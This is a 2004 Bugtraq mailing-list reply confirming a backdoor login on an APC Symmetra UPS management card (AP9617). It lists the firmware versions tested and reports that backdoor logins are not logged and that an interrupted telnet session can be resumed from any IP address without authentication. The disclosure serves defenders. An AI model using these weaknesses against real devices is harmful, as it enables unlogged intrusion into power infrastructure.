Date: 18 Feb 2004 16:58:43 -0000
From: brandon pierce <brandonp@...ynclh.com>
To: bugtraq@...urityfocus.com
Subject: Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"

Just tested on a client's Symmetra RM 12000 and had some interesting results with the following setup:

Model Number:           AP9617
Manufacture Date:       12/20/2002
Hardware Revision:      A10

Symmetra APP Ver:       120
Symmetra APP Date:      12/09/2002

AOS Card Ver:   120
AOS Card Date:  12/10/2002

There are a few side notes that should be noted:

The backdoor login does NOT show up in the event log for the system.

If the telnet session using the backdoor login is terminated with ^] then the session can be resumed simply by using telnet to sign back in with NO authentication. This even works if attempting to resume the session from a different IP address.